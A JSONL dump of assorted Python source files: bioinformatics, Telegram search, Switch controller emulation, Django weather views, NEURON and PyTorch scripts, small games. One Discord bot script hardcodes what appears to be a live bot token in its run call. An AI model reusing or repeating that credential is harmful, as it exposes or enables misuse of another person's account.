+{"seq_id":"456312504","text":"__author__ = 'Reza'\n\n\ndef find_pattern(pattern, text):\n\n    \"\"\"\n    Finds all occurrences of 'pattern' in 'text'\n\n    :param text:\n    :type text: str\n    :param pattern:\n    :type pattern: str\n    :return:\n    :rtype: list\n\n    Sample Input:\n    ATAT\n    GATATATGCATATACTTCTAGATGCT\n\n    Sample Output:\n    [1, 3, 9]\n    \"\"\"\n\n    k = len(pattern)\n    return [i for i in range(len(text) - k + 1) if text[i:i + k] == pattern]\n\nif __name__ == \"__main__\":\n\n    input_pattern = input(\"Enter pattern: \").upper()\n    input_text = input(\"Enter text: \").upper()\n\n    print(\"\\nThe result is:\", \" \".join(map(str, find_pattern(input_pattern, input_text))))","sub_path":"_103_PatternMatching.py","file_name":"_103_PatternMatching.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"129311356","text":"import socket\n\"\"\"https://stackoverflow.com/questions/20913411/test-if-an-internet-connection-is-present-in-python\"\"\"\ndef check_connection(website): #should be a string (ex.\"www.google.com\")\n    port = 80\n    try:\n        socket.create_connection((website, port))\n        return True\n    except OSError:\n        print(\"You can't connect to that website\")\n        return False","sub_path":"João/checkconnection.py","file_name":"checkconnection.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
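Editor's note: a hedged variant of the connectivity check in the record above. socket.create_connection accepts a timeout and returns a socket that is best closed rather than leaked; the three-second default below is the editor's choice, not the original author's.

import socket

def check_connection_with_timeout(website, port=80, timeout=3.0):
    # Returns True if a TCP connection to (website, port) succeeds within `timeout` seconds.
    try:
        with socket.create_connection((website, port), timeout=timeout):
            return True
    except OSError:
        return False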
+{"seq_id":"136081001","text":"\r\nimport PySimpleGUI as sg\r\nfrom telethon.sync import TelegramClient\r\nfrom telethon.tl.functions.messages import GetDialogsRequest\r\nfrom telethon.tl.types import InputPeerEmpty,InputPeerChannel,InputPeerUser\r\nimport sys,os\r\nfrom telethon.tl.functions.channels import InviteToChannelRequest\r\nfrom telethon import functions, types\r\n\r\n\r\nimport random\r\nimport time\r\nimport subprocess\r\nfrom pickle import dumps, load\r\nimport asyncio\r\n\r\n\r\n\r\n\r\nasync def doSearch(client, word):\r\n    res = []\r\n    res = await client(functions.contacts.SearchRequest(q=word,limit=100))\r\n    return res\r\n\r\n\r\n\r\n\r\nclass feeder:\r\n    def __init__(self, groupFrom, groupTo):\r\n        self.groupFrom = groupFrom\r\n        self.groupTo = groupTo\r\n\r\n\r\n\r\n############## DECLARATION ####################\r\nmegaGroups=[]\r\ngroups=['486469468','469496846']\r\ntoSearch = \"\"\r\nnewToSearch = \"\"\r\nresult=[]\r\nresultChats=[]\r\nvoyelles= ['a','e','i','o','u']\r\nconsonnes=['b','c','d','f','g','h','j','k','l','m','n','p','q','r','s','t','v','w','x','y','z']\r\n\r\n\r\napi_id = Your_API_Id\r\napi_hash = 'Your_API_HASH'\r\nphone = 'YOUR_PHONE_NUMBER'\r\nclient = TelegramClient(phone, api_id, api_hash)\r\nclient.connect()\r\n\r\n\r\n\r\n\r\n################# Main window #######################\r\nconnection_column = [\r\n    [sg.Button(\"Search\")]\r\n\r\n]\r\n\r\n\r\nlist_group=[\r\n    [sg.InputText(key=\"-Word-\")],\r\n    [sg.Listbox(values=[], enable_events=True,size=(50,20),key=\"-SearchResult-\", no_scrollbar= False)]\r\n]\r\n\r\n\r\n\r\nlayout =[\r\n    [\r\n        sg.Column(connection_column),\r\n        sg.Column(list_group)\r\n    ]\r\n]\r\n\r\n\r\nwindow = sg.Window(\"title\", layout)\r\n\r\n\r\nif not client.is_user_authorized():\r\n\t\tclient.send_code_request(phone)\r\n\t\tclient.sign_in(phone, input('Enter the code: '))\r\n\r\n\r\n\r\n\r\nasync def main():\r\n# LOOP\r\n    while True:\r\n        event, values = window.read()\r\n\r\n        if event==\"Search\":\r\n            toSearch = values[\"-Word-\"]\r\n            print(toSearch)\r\n\r\n            result = await doSearch(client,toSearch)\r\n            for r in result.chats:\r\n                resultChats.append(r)\r\n\r\n            ########################## vowels appended after the search word\r\n            for v in voyelles:\r\n                newToSearch = toSearch + v\r\n                print(\"new to search \" + newToSearch)\r\n                result=await doSearch(client,newToSearch)\r\n                print(\"new results: \" + str(len(result.chats)))\r\n\r\n                for r in result.chats:\r\n                    resultChats.append(r)\r\n\r\n            ########################## consonants appended after the search word\r\n            for c in consonnes:\r\n                newToSearch = toSearch + c\r\n                print(\"new to search \" + newToSearch)\r\n                result=await doSearch(client,newToSearch)\r\n                print(\"new results: \" + str(len(result.chats)))\r\n\r\n                for r in result.chats:\r\n                    resultChats.append(r)\r\n\r\n            titlesToDisplay = []\r\n            for r in resultChats:\r\n                titlesToDisplay.append(r.title)\r\n\r\n            window.Element('-SearchResult-').Update(values=titlesToDisplay)\r\n\r\n\r\n        # close the window\r\n        if event == sg.WIN_CLOSED:\r\n            break;\r\n\r\n    await client.disconnect()\r\n    window.close()\r\n\r\nwith client:\r\n    client.loop.run_until_complete(main())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"TeleSearch.py","file_name":"TeleSearch.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"69207570","text":"import asyncio\nimport logging\n\nfrom joycontrol.controller import Controller\nfrom joycontrol.controller_state import ControllerState, button_push\nfrom joycontrol.memory import FlashMemory\nfrom joycontrol.protocol import controller_protocol_factory\nfrom joycontrol.server import create_hid_server\n\nlogger = logging.getLogger(__name__)\n\n\nclass SwitchController():\n\tdef __init__(self, controller_state: ControllerState):\n\t\tself._controller_state = controller_state\n\t\tprint(\"L CALIBRATION:\")\n\t\tprint(controller_state.l_stick_state.get_calibration())\n\n\t@staticmethod\n\tasync def get_controller(reconnect_bt_addr=None, spi_flash=None, controller='PRO_CONTROLLER', 
capture_file=None,\n\t\t\t\t\t\t\t device_id=None):\n\t\t# parse the spi flash\n\t\tif spi_flash:\n\t\t\twith open(spi_flash, 'rb') as spi_flash_file:\n\t\t\t\tspi_flash = FlashMemory(spi_flash_file.read())\n\t\telse:\n\t\t\t# Create memory containing default controller stick calibration\n\t\t\tspi_flash = FlashMemory()\n\n\t\t# Get controller name to emulate from arguments\n\t\tcontroller = Controller.from_arg(controller)\n\t\tfactory = controller_protocol_factory(controller, spi_flash=spi_flash)\n\t\tctl_psm, itr_psm = 17, 19\n\t\ttransport, protocol = await create_hid_server(factory, reconnect_bt_addr=reconnect_bt_addr,\n\t\t\t\t\t\t\t\t\t\t\t\t\t ctl_psm=ctl_psm,\n\t\t\t\t\t\t\t\t\t\t\t\t\t itr_psm=itr_psm, capture_file=capture_file,\n\t\t\t\t\t\t\t\t\t\t\t\t\t device_id=device_id)\n\n\t\tcontroller_state: ControllerState = protocol.get_controller_state()\n\n\t\treturn SwitchController(controller_state)\n\n\t@staticmethod\n\tdef _set_stick(stick, direction, value):\n\t\tif direction == 'center':\n\t\t\tstick.set_center()\n\t\telif direction == 'up':\n\t\t\tstick.set_up()\n\t\telif direction == 'down':\n\t\t\tstick.set_down()\n\t\telif direction == 'left':\n\t\t\tstick.set_left()\n\t\telif direction == 'right':\n\t\t\tstick.set_right()\n\t\telif direction in ('h', 'horizontal'):\n\t\t\tif value is None:\n\t\t\t\traise ValueError(f'Missing value')\n\t\t\tif value == 'max':\n\t\t\t\tval = stick.get_calibration().h_center + stick.get_calibration().h_max_above_center\n\t\t\telif value == 'min':\n\t\t\t\tval = stick.get_calibration().h_center - stick.get_calibration().h_max_below_center\n\t\t\telif value == 'center':\n\t\t\t\tval = stick.get_calibration().h_center\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\t# TODO Convert -1 to +1 to the calibrated values.\n\t\t\t\t\tval = int(value)\n\t\t\t\texcept ValueError:\n\t\t\t\t\traise ValueError(f'Unexpected stick value \"{value}\"')\n\t\t\tstick.set_h(val)\n\t\telif direction in ('v', 'vertical'):\n\t\t\tif value is None:\n\t\t\t\traise ValueError(f'Missing value')\n\t\t\tif value == 'max':\n\t\t\t\tval = stick.get_calibration().v_center + stick.get_calibration().v_max_above_center\n\t\t\telif value == 'min':\n\t\t\t\tval = stick.get_calibration().v_center - stick.get_calibration().v_max_below_center\n\t\t\telif value == 'center':\n\t\t\t\tval = stick.get_calibration().v_center\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tval = int(value)\n\t\t\t\t\t# TODO Convert -1 to +1 to the calibrated values.\n\t\t\t\texcept ValueError:\n\t\t\t\t\traise ValueError(f'Unexpected stick value \"{value}\"')\n\t\t\tstick.set_v(val)\n\t\telse:\n\t\t\traise ValueError(f'Unexpected argument \"{direction}\"')\n\n\t\treturn f'{stick.__class__.__name__} was set to ({stick.get_h()}, {stick.get_v()}).'\n\n\tdef run(self, command: str):\n\t\tlogger.debug(command)\n\t\tif command in 'lrabxy':\n\t\t\tasyncio.ensure_future(button_push(self._controller_state, command))\n\t\telif command.startswith('s'):\n\t\t\tcommand = command.split(' ')\n\t\t\t# TODO Support 's hv '\n\t\t\tassert len(command) >= 3\n\t\t\tif command[1] == 'l':\n\t\t\t\tstick = self._controller_state.l_stick_state\n\t\t\telse:\n\t\t\t\tstick = self._controller_state.r_stick_state\n\t\t\tdirection = command[2]\n\t\t\tif len(command) > 3:\n\t\t\t\tvalue = command[3]\n\t\t\telse:\n\t\t\t\tvalue = None\n\t\t\ts = SwitchController._set_stick(stick, direction, value)\n\t\t\tlogger.debug(s)\n\t\t\tasyncio.ensure_future(self._controller_state.send())\n\t\telse:\n\t\t\tcommand = command.split(' ')\n\t\t\tassert len(command) >= 
2\n\t\t\tbutton = command[0]\n\t\t\tpushed = command[1] == 'd'\n\t\t\tself._controller_state.button_state.set_button(button, pushed)\n\t\t\t# Not sure if sending the state is needed but other methods use it.\n\t\t\tasyncio.ensure_future(self._controller_state.send())\n","sub_path":"server/switchremoteplay/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"306918146","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .forms import SignUpForm\nimport requests\nimport json\n\n\n\ndef home(request):\n    return render(request, 'home.html')\n\n\n@login_required(login_url=reverse_lazy('login'))\ndef forecast(request):\n    # fetch data from api\n    url = 'http://weather.news24.com/ajaxpro/Weather.Code.Ajax,Weather.ashx'\n    payload = {'cityId': '77107'}\n    # payload = {'cityId': '77031'} # bloemfontein\n    headers = {'X-AjaxPro-Method': 'GetForecast7Day'}\n    res = requests.post(url, data=json.dumps(payload), headers=headers)\n    data = res.json()\n    city = data['value']\n    forecasts_list = data['value']['Forecasts']\n\n    # pagination\n    page = request.GET.get('page', 1)\n    paginator = Paginator(forecasts_list, 3)\n    try:\n        forecasts = paginator.page(page)\n    except PageNotAnInteger:\n        forecasts = paginator.page(1)\n    except EmptyPage:\n        forecasts = paginator.page(paginator.num_pages)\n\n    return render(request, 'forecast.html', {\n        'city': city,\n        'forecasts': forecasts\n    })\n\n\ndef signup(request):\n    if request.method == 'POST':\n        form = SignUpForm(request.POST)\n        if form.is_valid():\n            user = form.save()\n            user.refresh_from_db() # load the profile instance created by the signal\n            user.save()\n            raw_password = form.cleaned_data.get('password1')\n            user = authenticate(username=user.username, password=raw_password)\n            login(request, user)\n            return redirect('home')\n    else:\n        form = UserCreationForm()\n    return render(request, 'signup.html', {'form': form})\n","sub_path":"src/weather_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"28066611","text":"\nclass Car:\n\t\"\"\"docstring for Car\"\"\"\n\tdef __init__(self, wheel_angle = 0, speed = 0):\n\t\tself.wheel_angle = wheel_angle\n\t\tself.speed = speed\n\t\tself.engineStatus = False\n\t\tself.seconds = 0\n\tdef loop(self):\n\t\twhile self.seconds < 200:\n\t\t\tself.seconds += 1\n\t\t\tself.speed -= 1\n\t\t\tself.wheel_angle = -1\n\t\t\tprint(\"speed = {}\".format(self.speed))\n\t\t\tprint(\"wheel_angle = {}\".format(self.wheel_angle))\n\tdef startEngine(self, time):\n\t\tif self.engineStatus == False:\n\t\t\tprint(\"WRRRR (on {}sec)\".format(time))\n\t\telse:\n\t\t\tprint(\"\")\n\tdef stopEngine(self, time):\n\t\tif self.engineStatus == False:\n\t\t\tprint(\"\".format(time))\n\t\telse:\n\t\t\tprint(\"UUUuum (on {}sec)\".format(time))\n\tdef obstacleHandler(self, time):\n\t\tpass\n\tdef act(self, event):\n\t\ttime = event[1]\n\t\tevent = event[0]\n\t\tif event == 'start the engine' :\n\t\t\tself.startEngine(time)\n\t\telif event == 'stop the engine' :\n\t\t\tself.stopEngine(time)\n\t\telif event == 'obstacle' :\n\t\t\tself.obstacleHandler(time)
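\n\n# Added note (hypothetical usage, not in the original file): an 'obstacle'\n# event would dispatch to obstacleHandler in the same way,\n# e.g. car1.act(('obstacle', 5)), which is currently a no-op.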
\n\ncar1 = Car()\ncar1.act(('start the engine', 10))\ncar1.act(('stop the engine', 10))","sub_path":"Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"380795096","text":"# vim: set filetype=python tabstop=4 shiftwidth=4 expandtab:\n\nimport collections\n\nfrom chat import handle_err, handle_signal, handle_start\nfrom git import handle_pull\n\nHandler = collections.namedtuple(\"Handler\", [\"method\", \"defer\"])\n\nEND = 0\nERR = 1\nSTART = 2\nPULL = 3\nSIGNAL = 128\n\n_handlers = {\n    ERR: Handler(handle_err, True),\n    START: Handler(handle_start, True),\n    PULL: Handler(handle_pull, False),\n    SIGNAL: Handler(handle_signal, True)\n}\n\n\ndef extract_status(exit_code):\n    if not exit_code:\n        return END, None\n\n    high = exit_code >> 8\n\n    if high:\n        return high, _handlers[high]\n    else:\n        return SIGNAL, Handler(lambda: _handlers[SIGNAL].method(exit_code), True)\n","sub_path":"src/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"271792318","text":"' Author: Darian Hadjiabadi '\n\nimport numpy as np\nfrom neuron import h, gui\n\nclass OLMCell(object):\n\n    def __init__(self):\n        self.prelist = []\n        self.all = None\n        self.soma = None\n        self.dend1 = None\n        self.dend2 = None\n        self.axon = None\n\n        self.init()\n\n    def init(self):\n        self.topol()\n        self.subsets()\n        self.geom()\n        self.biophys()\n        self.geom_nseg()\n        self.synapses()\n\n    def topol(self):\n        self.soma = h.Section(name='soma', cell=self)\n        self.dend1 = h.Section(name='dend1', cell=self)\n        self.dend2 = h.Section(name='dend2', cell=self)\n        self.axon = h.Section(name='axon', cell=self)\n\n        self.dend1.connect(self.soma(1))\n        self.dend2.connect(self.soma(0))\n        self.axon.connect(self.soma(0))\n        \n        self.basic_shape()\n\n    def basic_shape(self):\n        h.pt3dclear(sec=self.soma)\n        h.pt3dadd(0, 0, 0, 1, sec=self.soma)\n        h.pt3dadd(15, 0, 0, 1, sec=self.soma)\n\n        h.pt3dclear(sec=self.dend1)\n        h.pt3dadd(15, 0, 0, 1, sec=self.dend1)\n        h.pt3dadd(90, 0, 0, 1, sec=self.dend1)\n        \n        h.pt3dclear(sec=self.dend2)\n        h.pt3dadd(0, 0, 0, 1, sec=self.dend2)\n        h.pt3dadd(-74, 0, 0, 1, sec=self.dend2)\n        \n        h.pt3dclear(sec=self.axon)\n        h.pt3dadd(15, 0, 0, 1, sec=self.axon)\n        h.pt3dadd(15, 120, 0, 1, sec=self.axon)\n\n    def subsets(self):\n        self.all = h.SectionList()\n        self.all.wholetree(sec=self.soma)\n\n    def geom(self):\n        self.soma.L = 20\n        self.soma.diam = 10\n        \n        self.dend1.L = 250\n        self.dend1.diam = 3\n\n        self.dend2.L = 250\n        self.dend2.diam = 3\n\n        self.axon.L = 150\n        self.axon.diam = 1.5\n\n    def biophys(self):\n\n        Rm = 20000\n\n        for sec in self.all:\n            sec.Ra = 150\n            sec.cm = 1.3\n\n        self.soma.insert('IA')\n        for seg in self.soma:\n            seg.IA.gkAbar = 0.0165\n        self.soma.insert('Ih')\n        for seg in self.soma:\n            seg.Ih.gkhbar = 0.0005\n        self.soma.insert('Ksoma')\n        for seg in self.soma:\n            seg.Ksoma.gksoma = 0.0319\n        self.soma.insert('Nasoma')\n        for seg in self.soma:\n            seg.Nasoma.gnasoma = 0.0107\n            seg.Nasoma.gl = 1. / Rm\n            seg.Nasoma.el = -70\n\n        self.dend1.insert('IA')\n        for seg in self.dend1:\n            seg.IA.gkAbar = 0.004\n        self.dend1.insert('Kdend')\n        for seg in self.dend1:\n            seg.Kdend.gkdend = 2 * 0.023\n        self.dend1.insert('Nadend')\n        for seg in self.dend1:\n            seg.Nadend.gnadend = 2 * 0.0117\n            seg.Nadend.gl = 1. 
/ Rm\n seg.Nadend.el = -70\n\n self.dend2.insert('IA')\n for seg in self.dend2:\n seg.IA.gkAbar = 0.004\n self.dend2.insert('Kdend')\n for seg in self.dend2:\n seg.Kdend.gkdend = 2 * 0.023\n self.dend2.insert('Nadend')\n for seg in self.dend2:\n seg.Nadend.gnadend = 2 * 0.0117\n seg.Nadend.gl = 1. / Rm\n seg.Nadend.el = -70\n \n self.axon.insert('Kaxon')\n for seg in self.axon:\n seg.Kaxon.gkaxon = 0.05104\n self.axon.insert('Naaxon')\n for seg in self.axon:\n seg.Naaxon.gnaaxon = 0.01712\n seg.Naaxon.gl = 1. / Rm\n seg.Naaxon.el = -70\n\n def geom_nseg(self):\n lambda_f = h.lambda_f\n for seg in self.all:\n seg.nseg = int((seg.L/(0.1*lambda_f(100))+0.9)/2)*2+1\n\n def synapses(self):\n syn_ = h.MyExp2Syn(self.dend2(0.5))\n syn_.tau1 = 0.5\n syn_.tau2 = 3\n self.prelist.append(syn_) \n\n syn_ = h.MyExp2Syn(self.dend1(0.5))\n syn_.tau1 = 0.5\n syn_.tau2 = 3\n self.prelist.append(syn_)\n\n syn_ = h.MyExp2Syn(self.soma(0.5))\n syn_.tau1 = 1\n syn_.tau2 = 8\n syn_.e = -75\n self.prelist.append(syn_)\n\n syn_ = h.MyExp2Syn(self.soma(0.5))\n syn_.tau1 = 35\n syn_.tau2 = 100\n syn_.e = -75\n \n","sub_path":"python_port/olm_cell2.py","file_name":"olm_cell2.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"438854311","text":"from __future__ import print_function\n\nimport re\nimport os\n\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms, models\nfrom torch.autograd import Variable\nfrom model import *\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch GTSRB example')\nparser.add_argument('--data', type=str, default='data', metavar='D',\n help=\"folder where data is located. 
train_data.zip and test_data.zip need to be found in the folder\")\nparser.add_argument('--batch-size', type=int, default=32, metavar='N',\n                    help='input batch size for training (default: 32)')\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\n                    help='number of epochs to train (default: 10)')\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n                    help='learning rate (default: 0.01)')\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n                    help='SGD momentum (default: 0.5)')\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n                    help='random seed (default: 1)')\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\n                    help='how many batches to wait before logging training status')\nparser.add_argument('--model_file', type=str, default=None, metavar='PU',\n                    help='pick up where you were (default: None)')\nparser.add_argument('--model_name', type=str, default='model', metavar='MN',\n                    help='name of the model file (default: model)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\n\n### Data Initialization and Loading\nfrom data import initialize_data, data_transforms # data.py in the same folder\ntrain_images, train_labels, val_images, val_labels = initialize_data(args.data) # extracts the zip files, makes a validation set\n\n\n\n\ntrain_dataset = torch.utils.data.TensorDataset(train_images, train_labels)\nval_dataset = torch.utils.data.TensorDataset(val_images, val_labels)\n\n\ntrain_loader = torch.utils.data.DataLoader(\n    train_dataset,\n    batch_size=args.batch_size, shuffle=True, num_workers=4)\nval_loader = torch.utils.data.DataLoader(\n    val_dataset,\n    batch_size=args.batch_size, shuffle=False, num_workers=4)\n\nnet = Net()\nfirst_epoch = 1\n\nif args.model_file and os.path.isfile(args.model_file):\n    print(\"loading {}\".format(args.model_file))\n    first_epoch = int(re.findall('_(\\\\d+).pth', args.model_file)[0]) +1\n    net.load_state_dict(torch.load(args.model_file))\n\ncuda = torch.cuda.is_available()\nif cuda:\n    net = net.cuda()\n\noptimizer = optim.Adadelta(net.parameters())\n\ndef rmse_loss(input, target, size_average=True):\n    loss = torch.sqrt(\n        torch.mean((input - target).pow(2), 1))\n    if size_average:\n        return torch.mean(loss)\n    else:\n        return torch.sum(loss)\n\nLossFunc = rmse_loss\n\n
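# Quick illustrative check of rmse_loss (added note, not part of the original script):\n# with a = torch.zeros(2, 3) and b = torch.ones(2, 3), every per-row RMSE is 1.0,\n# so rmse_loss(a, b) evaluates to 1.0 and rmse_loss(a, b, size_average=False) to 2.0.\n\n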
def train(epoch):\n    net.train()\n    for batch_idx, (data, target) in enumerate(train_loader):\n        data, target = Variable(data), Variable(target)\n        if cuda:\n            data, target = data.cuda(), target.cuda()\n        optimizer.zero_grad()\n        output = net(data)\n        loss = LossFunc(output, target)\n        loss.backward()\n        optimizer.step()\n        if batch_idx % args.log_interval == 0:\n            print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n                epoch, batch_idx * len(data), len(train_loader.dataset),\n                100. * batch_idx / len(train_loader), loss.data[0]))\n\ndef validation():\n    net.eval()\n    validation_loss = 0\n    correct = 0\n    for data, target in val_loader:\n        data, target = Variable(data, volatile=True), Variable(target)\n        if cuda:\n            data, target = data.cuda(), target.cuda()\n        output = net(data)\n        lo = LossFunc(output, target, size_average=False).data[0] # sum up batch loss\n        validation_loss += lo\n        # print(lo)\n\n    validation_loss /= len(val_loader.dataset)\n    print(len(val_loader.dataset))\n    print('\\nValidation set: Average loss: {:.4f}\\n'.format(validation_loss))\n    return validation_loss\n\nploss = 0\npploss = 0\nval_loss = 0\nloss_min = 1000\nPreState = None\nstrict_save = args.model_file is not None\n\nfor epoch in range(first_epoch, args.epochs + 1):\n    PreState = net.state_dict()\n    train(epoch)\n    pploss, ploss, val_loss = ploss, val_loss, validation() \n    if pploss > ploss and ploss < val_loss and (not strict_save or strict_save and ploss < loss_min):\n        loss_min = ploss\n        model_file = \"{}_{}.pth\".format(args.model_name, epoch-1)\n        torch.save(PreState, model_file)\n        print('\\nSaved model to ' + model_file + '. You can run `python evaluate.py ' + model_file + '` to generate the Kaggle formatted csv file')\n        strict_save = True\n        \nmodel_file = \"{}_{}.pth\".format(args.model_name, args.epochs)\ntorch.save(PreState, model_file)\n","sub_path":"GalaxyZoo-DenseNet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"483121037","text":"import tkinter\nfrom tkinter import *\n\nwindow = tkinter.Tk()\nv=\"start\"\nlbl = Label(window, text=v)\nlbl.pack()\ndef changelabel(v):\n    lbl.config(text=v)\nv =\"New, dynamic text!\"\nbtn=Button(window, text=\"Change label text\", command=lambda: changelabel(v))\nbtn.pack()\n\nbtn2=Button(window, text=\"Change label text\", command=lambda: otherlabel(v))\nbtn2.pack()\n\ndef otherlabel(v):\n\tlbl2 = Label(window, text=\"TOD\")\n\tlbl2.pack()\n\nwindow.mainloop()","sub_path":"tester2.py","file_name":"tester2.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"510253553","text":"import discord\nimport time\nfrom discord.ext import commands\nimport random\nimport urllib\nimport urllib.request\nimport sys\nimport time\nimport subprocess\nfrom bs4 import BeautifulSoup\n\n\nclient = discord.Client()\n\ndescription = '''school script by Tobias Feld '''\nbot = commands.Bot(command_prefix='!', description=description)\nlink = 'http://rooster.clvleerlingen.nl/rooster.php?klas%5B%5D=a3c&type=Klasrooster&wijzigingen=1&school=448'\n\nhtml = str(urllib.request.urlopen(link).read())\n\n\nhtml1 = html[5506:-480]\nx = html1.replace(\"\\\\n\", \"\")\nz = x.replace(\"\\\\r\", \"\")\ny = z.replace(\"?\", \"\")\np = y.replace(\"ste\", \"\")\nsoup = BeautifulSoup(p, \"html.parser\")\n\nc = soup.get_text()\n\nprint(c)\n\n \n@bot.event\nasync def on_ready():\n    print('Logged in as')\n    print(bot.user.name)\n    print(bot.user.id)\n    print('------')\n\n\"\"\" below: copy the roster over literally \"\"\"\n\"\"\"roosterlink = http://bit.ly/2cfKjkS\"\"\"\n\nweekdag = time.strftime(\"%w\")\n@bot.command()\nasync def school():\n    \"\"\"start a script for school \"\"\"\n    if weekdag == \"4\":\n        await bot.say(c)\n\n\n\n@bot.command()\nasync def rooster():\n    await bot.say(link)\n    await bot.type()\n    if weekdag == \"0\":\n        await bot.say(\"Vandaag is er geen School 
:nerd:\")\n elif weekdag == \"6\":\n await bot.say(\"Vandaag is er geen School :nerd:\")\n else:\n with open('http://bit.ly/2cfKjkS', 'rb') as f:\n \n await bot.upload()\n\n@bot.command()\nasync def close():\n await bot.say(\"logging out!\")\n await bot.logout()\n \nbot.run('MjIwMjE3NjIxNjE2Nzg3NDU3.Cqeh-w.gR8XOZKvqxaQwYztoMBUGkZykYM')\n","sub_path":"basic_bot.py","file_name":"basic_bot.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"76212830","text":"import random\r\n\r\nlista_palavras = [\"final fantasy\",\"fortnite\",\"assassins creed\",\"infamous\",\"god of war\",\"the last of us\",\"watch dogs\",\"resident evil\",\"unravel\",\"the witcher\",\"detroit become human\",\"hitman\",\"uncharted\",\"minecraft\"]\r\n\r\ndef escolher_palavra():\r\n\r\n palavra = random.choice(lista_palavras)\r\n\r\n return palavra.upper()\r\n\r\ndef mostrar_palavra(palavra):\r\n\r\n palavra_listrada = \"_\" * len(palavra)\r\n adivinhou = False\r\n tentou_letras = []\r\n tentou_palavras = []\r\n tentativas = 6\r\n\r\n print(\"A Forca dos Jogos\")\r\n print(\"Espaço tambem é válido\")\r\n print(\"Você tem\",tentativas,\"tentativas\")\r\n print(palavra_listrada)\r\n print(\"\\n\")\r\n\r\n while not adivinhou and tentativas > 0:\r\n\r\n letra = input(\"Digite uma letra: \").upper()\r\n\r\n if len(letra) == 1 :\r\n\r\n if letra in tentou_letras:\r\n\r\n print(\"Você já digitou a letra\",letra)\r\n\r\n elif letra not in palavra:\r\n\r\n print(letra,\"não está na palavra!\")\r\n\r\n tentativas -= 1\r\n tentou_letras.append(letra)\r\n\r\n else:\r\n\r\n print(letra,\"está na palavra!\")\r\n\r\n tentou_letras.append(letra)\r\n palavra_em_lista = list(palavra_listrada)\r\n indices = [i for i, letter in enumerate(palavra) if letter == letra]\r\n\r\n for posicao in indices:\r\n\r\n palavra_em_lista[posicao] = letra\r\n palavra_listrada = \"\".join(palavra_em_lista)\r\n\r\n if \"_\"not in palavra_listrada:\r\n\r\n adivinhou = True\r\n else:\r\n\r\n print(\"Não é válido. Digite uma LETRA.\")\r\n print(\"Você tem\",tentativas,\"tentativas\")\r\n print(palavra_listrada)\r\n print(\"\\n\")\r\n\r\n if adivinhou:\r\n\r\n print(\"Voce acertou qual é o jogo!\")\r\n\r\n else:\r\n\r\n print(\"Você perdeu!\")\r\n\r\ndef iniciar_jogo():\r\n\r\n palavra = escolher_palavra()\r\n mostrar_palavra(palavra)\r\n\r\n while input(\"Jogar novamente? 
(S/N) \").upper() == \"S\":\r\n\r\n palavra = escolher_palavra()\r\n mostrar_palavra(palavra)\r\n\r\niniciar_jogo()\r\n","sub_path":"Forca_dos_Jogos.py","file_name":"Forca_dos_Jogos.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"245681555","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#version : 1.1\nimport time\nfrom api import *\n\n\"\"\"\ntry:\n\timport argparse\n\tflags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n\tflags = None\n\"\"\"\n\ndef main():\t\n\tstart = time.time()\n\tgs = Google_spreadsheets()\n\tprint('WORKERS - %s' %gs.workers_count)\n\tgs.service = gs.auth()\n\tgs.target_ss_id = gs.ss_ids['moya_baza']\n\tgs.target_ws_title = 'задание-паша'\n\tmatches = gs.find_matches()\n\tgs.write_to_log('Время выполнения %ss' %(time.time() - start))\n\nif __name__ == '__main__':\n main()","sub_path":"google_spreadsheets/spreadsheets/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"212990730","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in 